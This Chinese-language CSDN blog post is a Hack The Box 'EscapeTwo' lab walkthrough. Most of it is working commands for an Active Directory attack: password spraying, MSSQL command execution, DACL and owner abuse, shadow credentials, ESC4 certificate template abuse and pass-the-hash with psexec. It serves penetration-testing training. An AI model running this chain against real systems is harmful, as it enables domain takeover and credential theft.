HTB:EscapeTwo[WriteUP]

已于 2025-02-05 22:16:09 修改
阅读量1.6k 收藏 15
点赞数 18
文章标签: 网络安全
于 2025-02-05 22:14:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/145429322
版权

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

使用smbmap枚举靶机SMB服务器共享

继续使用smbmap递归枚举`Accounting Department`共享

使用WPS打开该EXCEL文件

边界突破

使用netexec枚举靶机域内用户

使用netexec通过上述账户、密码列表进行密码喷洒

使用netexec测试这两个凭证是否可用

使用netexec通过MSSQL凭证对靶机进行目录遍历

使用netexec通过上述密码对靶机域内用户进行密码喷洒

使用evil-winrm通过上述凭证登录靶机

权限提升

使用netexec枚举靶机域内信息

使用BloodHound查看ryan用户的可传递控制对象

查看ca_svc用户信息

使用bloodyAD将ca_syc用户拥有者修改为ryan用户

使用impacket-dacledit将ryan用户对ca_svc用户的权限修改为完全控制

使用certipy-ad创建ca_svc用户影子证书

使用Certify枚举靶机域内证书模板

使用certipy-ad通过ca_svc哈希密码枚举靶机ADCS尝试发现该漏洞

使用certipy-ad通过ca_svc哈希密码重写该模板信息,使其符合攻击要求

使用certipy-ad请求一份Administrator用户符合模板要求的证书

使用certipy-ad借助pfx证书通过身份认证

使用impacket-psexec通过上述哈希凭证登录靶机

连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.51

靶机AD:sequel.htb

靶机DC:DC01.sequel.htb

  • 已有凭证

账户:rose

密码:KxEPkKe6R8su

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a escapetwo.htb -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,                                       
53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49689,49690,49693,49706,49722,49731,49814
                                                                                                                           
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
                                                                                                                           
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports                            
53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49689,49690,49693,49706,49722,49731,49814

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn escapetwo.htb

  • 需要重点关注的服务和信息

AD域名:sequel.htb

53端口:Domain服务

88端口:Kerberos服务

389端口:LDAP服务

445端口:SMB服务

1433端口:SQL-Server服务

5985端口:Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn escapetwo.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn escapetwo.htb

使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p53,123 -sCV -Pn escapetwo.htb

使用smbmap枚举靶机SMB服务器共享

smbmap -u 'rose' -p 'KxEPkKe6R8su' -H escapetwo.htb

继续使用smbmap递归枚举`Accounting Department`共享
smbmap -u 'rose' -p 'KxEPkKe6R8su' -H escapetwo.htb -r 'Accounting Department'

  • 将`accounts.xlsx`文件下载到攻击机本地
smbmap -u 'rose' -p 'KxEPkKe6R8su' -H escapetwo.htb -r 'Accounting Department' --download './Accounting Department/accounts.xlsx'

使用WPS打开该EXCEL文件

  • 由此可得四份密码,将其保存为列表另作他用

0fwz7Q4mSpurIt99

86LxLBMgEWaKUnBG

Md9Wlq1E5bZnVDVo

MSSQLP@ssw0rd!

cat << EOF > passwds.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat << EOF > passwds.txt                                    
heredoc> 0fwz7Q4mSpurIt99
86LxLBMgEWaKUnBG
Md9Wlq1E5bZnVDVo
MSSQLP@ssw0rd!
heredoc> EOF

边界突破

使用netexec枚举靶机域内用户

nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users

  • 将用户名提取保存成列表
nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users | grep -A50 Username | tail -n+2 | awk '{print $5}' | tee names.txt

使用netexec通过上述账户、密码列表进行密码喷洒
nxc ldap escapetwo.htb -d sequel.htb -u names.txt -p passwds.txt --continue-on-success

账户:oscar

密码:86LxLBMgEWaKUnBG

  • 除此之外,我还关注到sa账户密码带有mssql字样

账户:sa

密码:MSSQLP@ssw0rd!

使用netexec测试这两个凭证是否可用
nxc winrm escapetwo.htb -u 'oscar' -p '86LxLBMgEWaKUnBG'
nxc mssql escapetwo.htb -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'whoami'

使用netexec通过MSSQL凭证对靶机进行目录遍历

nxc mssql escapetwo.htb -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir "C:\SQL2019\ExpressAdv_ENU"'
  • C:\SQL2019\ExpressAdv_ENU目录中可见sql-Configuration.INI文件

  • 查看该文件内容
nxc mssql escapetwo.htb -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'type "C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI"'

  • 获得一凭证

账户:SEQUEL\sql_svc

密码:WqSZAF6CysDQbGb3

使用netexec通过上述密码对靶机域内用户进行密码喷洒
nxc ldap escapetwo.htb -d sequel.htb -u names.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success

  • 测试这两个账户哪个可用于Win-RM登录
nxc winrm escapetwo.htb -d sequel.htb -u names2.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success

使用evil-winrm通过上述凭证登录靶机

evil-winrm -i escapetwo.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'

  • C:\Users\ryan\Desktop找到user.txt文件

权限提升

使用netexec枚举靶机域内信息

nxc ldap sequel.htb -d sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' --dns-server 10.10.11.51 --bloodhound -c All

使用BloodHound查看ryan用户的可传递控制对象

  • 由图表可见,ryan用户对ca_svc用户具有WriteOwner权限
查看ca_svc用户信息
net user ca_svc /domain

  • 由输出可见,该用户属于Cert Publishers

使用bloodyAD将ca_syc用户拥有者修改为ryan用户

bloodyAD -d escapetwo.htb --dc-ip 10.10.11.51 --dns 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# bloodyAD -d escapetwo.htb --dc-ip 10.10.11.51 --dns 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

使用impacket-dacledit将ryan用户对ca_svc用户的权限修改为完全控制
python3.11 dacledit.py -action 'write' -principal 'ryan' -target 'ca_svc' 'sequel.htb/ryan:WqSZAF6CysDQbGb3'

┌──(kali㉿kali)-[~/Desktop/temp]
└─$ python3.11 dacledit.py -action 'write' -principal 'ryan' -target 'ca_svc' 'sequel.htb/ryan:WqSZAF6CysDQbGb3'            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250205-014331.bak
[*] DACL modified successfully!

  • 将本地时钟与靶机同步
sudo ntpdate escapetwo.htb
使用certipy-ad创建ca_svc用户影子证书
certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -target escapetwo.htb -dc-ip 10.10.11.51 -ns 10.10.11.51

  • 与此同时获得该用户NTLM密码哈希

账户:ca_svc

密码哈希:3b181b914e7a9d5508ea1e20bc2b7fce

  • 将Certify.exe上传至靶机
upload Certify.exe
使用Certify枚举靶机域内证书模板
.\Certify.exe find /domain:sequel.htb

<...SNIP...>

  • 由输出可见,该模板对Domain Admins具有注册权利,而且Cert Publishers对该模板具有完全控制权限,因此恶意利用该模板即可获取管理员密码哈希
使用certipy-ad通过ca_svc哈希密码枚举靶机ADCS尝试发现该漏洞
certipy-ad find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable -stdout

  • 由末尾输出可见,利用该模板可导致ESC4漏洞攻击

使用certipy-ad通过ca_svc哈希密码重写该模板信息,使其符合攻击要求

certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -k -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug

使用certipy-ad请求一份Administrator用户符合模板要求的证书

certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51
  • 这里尝试了很多次,需要在certipy-ad更新了模板后快速执行该命令才能成功

使用certipy-ad借助pfx证书通过身份认证
certipy-ad auth -pfx administrator_10.pfx

使用impacket-psexec通过上述哈希凭证登录靶机

impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 'aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff'

  • C:\Users\Administrator\Desktop目录下找到root.txt文件

Windows渗透实战之EscapeTwo
2401_83799022的博客
02-20 999
获得sql_svc的shell,但当前用户并没有user.txt,同时在Users下发现了ryan,猜测user.txt在他的目录下在C:下发现SQL2019,cd进去发现ExpressAdv_ENU在该目录下发现sql-Configuration.INI。拿到这些凭据,可以考虑爆破,但要针对性的爆破,看到表格中的密码涉及了mssql,考虑会不会是mssql的账号密码我们结助netexec来爆破,当然也可以根据密码的特殊性,先尝试一下sa这组凭据。在命令后加上--local-auth。
HTB:Topology[WriteUP]
如有错误感谢斧正
01-10 939
(目前仅支持oneliner)。点击“生成”将直接返回一个.PNG文件,您可以使用Ctrl+S(或Command+S,如果在Mac上)保存。靶机IP:10.10.11.217。使用此公式生成器创建.PNG文件。分配IP:10.10.16.13。密码:calculus20。账户:vdaisley。
HTB-EscapeTwo
qq_51845659的博客
03-18 406
ESC4 滥用 Active Directory 帐户的密钥凭据属性,允许攻击者使用基于证书的身份验证绕过以其他用户身份进行身份验证。添加恶意密钥凭证,并允许使用证书而不是密码以 ca_svc 的身份进行身份验证。使用certipy工具,通过哈希密码枚举靶机ADCS尝试发现该漏洞。使用certipy通过哈希密码重写模板。
HTB-Escape
2201_75378806的博客
06-01 773
端口扫描开放SMB (445)、NetBIOS (135/139)、LDAP (389 等) 和 WinRM (5985),以及通常在 DC 上监听的 53 (DNS) 和 88 (Kerberos)。还有一个 MSSQL 服务器 (1433)。加入/hostsnmap扫描里面有有关证书的提示了解一下正在使用的 TLS 证书,使用openssl拉取和格式化它Data:Validity有趣的是,请注意颁发证书的证书颁发机构,续集sequel-DC-CA。smb枚举。
htb_Escape (mssql渗透,winrm)
weixin_62621015的博客
04-01 527
hack the box靶场 Escape
Offensive Escape 靶机渗透
Shadow的博客
03-27 4669
Offensive escape
春秋云镜-内网极限挑战赛-Exchange
M1n9K1n9的博客
04-08 2724
看到奖品还有证书,还涉及oscp方面的东西,过来打打 感谢TryHackMe Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。 由于是付费的,时间就是金钱,为了节省点钱,我只好利用wp来进行半引导式渗透 借此来复习一下TryHackMe
HTB:Blue[WriteUP]
如有错误感谢斧正
10-11 818
受影响的操作系统包括各种版本,如 Windows Vista、Windows Server 2008、Windows 7 和 Windows 8 等。由输出结果可见,靶机启用共享:ADMIN$、C$、IPC$、Share、Users。由fscan扫描结果可见,靶机开放端口:135、139、445 共。由扫描结果可见,靶机极有可能存在MS17-010漏洞。使用use命令直接使用该eternalblue模块。靶机IP:10.10.10.40。将靶机IP填入RHOSTS选项中。将靶机IP填入RHOSTS选项中。
HTB:CozyHosting[WriteUP]
如有错误感谢斧正
10-24 1520
*] WebTitle http://10.10.11.230 code:301 len:178 title:301 Moved Permanently 跳转url: http://cozyhosting.htb。分别将kanderson、admin用户密码哈希值写入hash1、hash2文件中。已知靶机Web应用程序使用Spring-boot,再次使用对应字典对路径FUZZ。我们这里就分别获得了kanderson、admin用户的密码哈希值。尝试对admin用户哈希文件进行爆破。
HTB:Unified[WriteUP]
如有错误感谢斧正
10-03 1314
注:刚开始我弹shell一直不成功,如果你也有同样的问题,检查--command后代码的空格。(轻量级目录访问协议,可构造恶意数据让应用连接攻击者控制的服务器执行远程代码)(远程方法调用协议,攻击者创建恶意服务器注册远程对象让应用获取执行恶意代码)SHA-512这种类型的哈希值是不太可能爆破的出来的。可以看到CVE-2021-44530可以影响到。另起一终端,使用tcpdump抓取本地。
HTB:Broker[WriteUP]
如有错误感谢斧正
10-20 1211
它允许用户通过HTTP协议对服务器上的文件进行远程操作,就好像在本地文件系统中操作文件一样,包括创建、删除、移动、复制文件和文件夹以及修改文件的属性等,还支持多个用户对文件进行协作编辑,不同用户可以同时访问和修改服务器上的文件,并且可以跟踪文件的版本变化,方便团队协作。“dav_methods”指令可以设置允许的 WebDAV 方法,比如可以设置为“PUT”“DELETE”“MKCOL”“COPY”“MOVE”等不同的方法组合,以控制服务器对特定路径下的 WebDAV 请求所允许执行的操作。
HTB:Alert[WriteUP]
如有错误感谢斧正
02-02 1122
密码哈希:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/密码:manchesterunited。靶机Domain:alert.htb。分配IP:10.10.16.22。靶机IP:10.10.11.44。
HTB:Support[WriteUP]
如有错误感谢斧正
01-25 1074
密码:Ironside47pleasure40Watchful。靶机Domain:support.htb。靶机IP:10.10.11.174。分配IP:10.10.16.21。88端口:Kerberos服务。5985端口:Win-RM服务。53端口:Domain服务。389端口:LDAP服务。445端口:SMB服务。账户:support。
HTB:Forest[WriteUP]
如有错误感谢斧正
01-28 981
靶机Domain:forest.htb。靶机IP:10.10.10.161。分配IP:10.10.16.21。88端口:Kerberos服务。5985端口:Win-RM服务。账户:svc-alfresco。AD域名:htb.local。53端口:Domain服务。389端口:LDAP服务。445端口:SMB服务。密码:s3rvice。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8683
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
COMSOL多物理模拟下二氧化碳驱替甲烷:热流固耦合中煤层变形及物性变化对产气量及封存能力的影响
最新发布
04-29
内容概要:本文详细介绍了使用COMSOL多物理场仿真软件,在热流固耦合框架下,研究二氧化碳驱替甲烷过程中的煤层变形、孔渗变化及其对甲烷产量和二氧化碳封存量的影响。首先,文章解释了二氧化碳驱替甲烷作为一种关键技术的意义,然后逐步展示了模型的构建方法,包括设定煤层作为多孔介质、考虑其复杂物理特性(如渗透率、孔隙度)以及模拟二氧化碳注入和甲烷释放过程。接着,通过对模拟结果的分析,揭示了煤层在二氧化碳注入后的明显变形、孔渗特性的显著变化,最终得出甲烷产量与煤层孔渗特性紧密相关,而二氧化碳封存量受煤层变形和孔渗变化影响的结论。最后,强调了该模型对未来理解和优化驱替过程的重要性。 适合人群:从事能源领域研究的专业人士,尤其是关注二氧化碳驱替甲烷技术的研究人员和技术人员。 使用场景及目标:适用于需要深入了解二氧化碳驱替甲烷过程中煤层变形和孔渗变化机理的研究项目,旨在提高甲烷产量和二氧化碳封存量的理解和优化。 其他说明:文中提供了详细的建模步骤和代码分析,有助于读者掌握COMSOL多物理场仿真的具体操作方法。
少儿编程scratch项目源代码文件案例素材-我的世界 守卫者.zip
04-29
少儿编程scratch项目源代码文件案例素材-我的世界 守卫者.zip
【制造业AGV调度系统】基于Python的两交叉轨道AGV调度优化:任务分配、路径规划与充电管理设计了一个针对制造业环境中(含详细可运行代码及解释)
04-29
内容概要:本文详细探讨了制造业工厂中两条交叉轨道(红色和紫色)上的自动导引车(AGV)调度问题。系统包含2辆红色轨道AGV和1辆紫色轨道AGV,它们需完成100个运输任务。文章首先介绍了AGV系统的背景和目标,即最小化所有任务的完成时间,同时考虑轨道方向性、冲突避免、安全间隔等约束条件。随后,文章展示了Python代码实现,涵盖了轨道网络建模、AGV初始化、任务调度核心逻辑、电池管理和模拟运行等多个方面。为了优化调度效果,文中还提出了冲突避免机制增强、精确轨道建模、充电策略优化以及综合调度算法等改进措施。最后,文章通过可视化与结果分析,进一步验证了调度系统的有效性和可行性。 适合人群:具备一定编程基础和对自动化物流系统感兴趣的工程师、研究人员及学生。 使用场景及目标:①适用于制造业工厂中多AGV调度系统的开发与优化;②帮助理解和实现复杂的AGV调度算法,提高任务完成效率和系统可靠性;③通过代码实例学习如何构建和优化AGV调度模型,掌握冲突避免、路径规划和电池管理等关键技术。 其他说明:此资源不仅提供了详细的代码实现和理论分析,还包括了可视化工具和性能评估方法,使读者能够在实践中更好地理解和应用AGV调度技术。此外,文章还强调了任务特征分析的重要性,并提出了基于任务特征的动态调度策略,以应对高峰时段和卸载站拥堵等情况。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

x0da6h

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值